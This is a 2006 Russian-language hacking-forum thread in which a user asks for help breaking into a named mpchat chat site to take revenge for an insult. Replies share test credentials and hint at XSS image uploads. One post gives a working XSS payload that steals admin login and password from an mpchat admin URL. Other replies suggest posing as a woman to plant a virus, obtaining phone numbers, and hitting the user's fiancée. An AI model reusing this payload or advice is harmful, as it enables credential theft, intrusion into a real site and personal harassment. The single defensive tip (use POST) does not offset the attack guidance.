Чем взять mpchat

Discussion in 'Песочница' started by West, 19 Jan 2006.

Thread Status:
Not open for further replies.
  1. West

    West New Member

    Joined:
    18 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    дайте совет ка и чем взять mpchat ! XSS пробовал не пашет хотел r57shell загрузить тоже облом !
    Вот ссылка на чат http://chat.sehri.com/ кто памажет советом ??? :confused:
     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Тестовые логин и пароль:

    pupozoid;pupozoid
     
  3. West

    West New Member

    Joined:
    18 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    ((

    Я зашол но ничего если можно то в личку пошли что ты там зделал ?? (
     
  4. West

    West New Member

    Joined:
    18 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    ((((

    Люди Братья Помогите найти дыру в чате http://chat.sehri.com ето mpchat за обиду нанесённую моей невесте ((((((( :(
     
  5. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    [offtop]
    За обиду нанесённую твоей невесте, пойди и набей морды)))
    [/offtop]
     
  6. West

    West New Member

    Joined:
    18 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Я 5 раз ходил на стрелу но никто не пришол еслибы пришли я им кишки спустилбы а теперь они издеваютса банят а я перезохожу и нифига просто смеютса надомной я думал что здесь пантовые ребята а оказываетса тут нет тех кто паможет мне Советом по взлому !!! :( ОБИДНО
     
  7. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    У меня там ваще девственно чистая страничка (www.chat.sehri.com)
     
    _________________________
  8. West

    West New Member

    Joined:
    18 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    ((

    У меня нет в вирте wm !!!
     
  9. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Можно xss-картинки аплоудить. Нащет этого лучше к censored! обращайся... ;)
     
  10. West

    West New Member

    Joined:
    18 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    (((

    да никто не дал тут совета мне приличног кажетса ни кто не может справитса с МР чатом !!! Хот спасибо что посмотрели маю тему !!
     
  11. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Попробуй в сообщении кинуть картинку-пиздельщик :d
     
  12. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Всмысле не в сообщении(а там есть такая штука как "Почта")
     
  13. blob

    blob New Member

    Joined:
    28 Feb 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Чат ломается на уровне хтмла... до базы мне долезть не удалось, но вживление скрипта катит. Даже при наличии yourkey модера я не смог залезть в админку... сервак проверяет сессию на такие вещи. Но реально поиметь внутреннюю почту. Уязвимость в движке у всех чатов mpchat, маленькая, но позволяет делать с ним и с юзерами многое. Я сам с сегодня обижен на один такой чат :) ибо забанили всех клонов и повесили подтверждение на регистрацию :) влезу... убью :)
     
  14. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Вот и помоги West-у, но тока в открытую не выкладывай. А то завтра ее, баги, уже не будет, а таких как West - будут. И будут также просить. Ну где их еще то взять, если баги постоянно закрывают?
     
    _________________________
  15. blob

    blob New Member

    Joined:
    28 Feb 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    To West.. в личку пиши, ща в нём сижу... У них в порядке вещей закидывать окнами ? Пиши короче
     
  16. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    А что вообше твоя невеста в чате делает ? лень просто стобой день провести ? или она уже к тебе равнодушна ? вообшим это твои проблемы, но я бы на твоём месте , не Админа морду набил, а твоей невести, вот тогда посмотрим он зайдёт в чаты или нет.
     
  17. ¤ ¤ ¤Эльф¤ ¤ ¤

    Joined:
    11 Jan 2006
    Messages:
    25
    Likes Received:
    2
    Reputations:
    1
    код для теста xss
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
    <textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
    <input type="submit">
    </form>[/QUOTE]<span id='postcolor'>

    птом открыть админку и открыть чтарницу с этим кодом, птом заменить в поле alert() на
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'>

    и послать форму и откроется страница с xss иньекцией которая обратится в окно с именем administration и даст url с логином и пассвордом.

    Что бы обезопасить свой чат нужно метод get сменить на post, тогда в админке url не будет состоять из логина и пассворда.
     
  18. vlcman

    vlcman New Member

    Joined:
    9 Mar 2007
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    ¤ ¤ ¤Эльф¤ ¤ ¤
    можно поподробней?
     
  19. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    И еще метод - я не думаю, что там уже оч прошареные админы. Зарегься под какой-нибудь шикарной бабой (пускай твой диалог займет больше времени), всунь фотку модели какой, и
    1. Всунь вирус поновее, чтобы они не просекли.
    2. Узнай номер телефона.
    Тогда и поговоришь по душам с теми людьми, коль уж они тебе так насолили ;)
     
Thread Status:
Not open for further replies.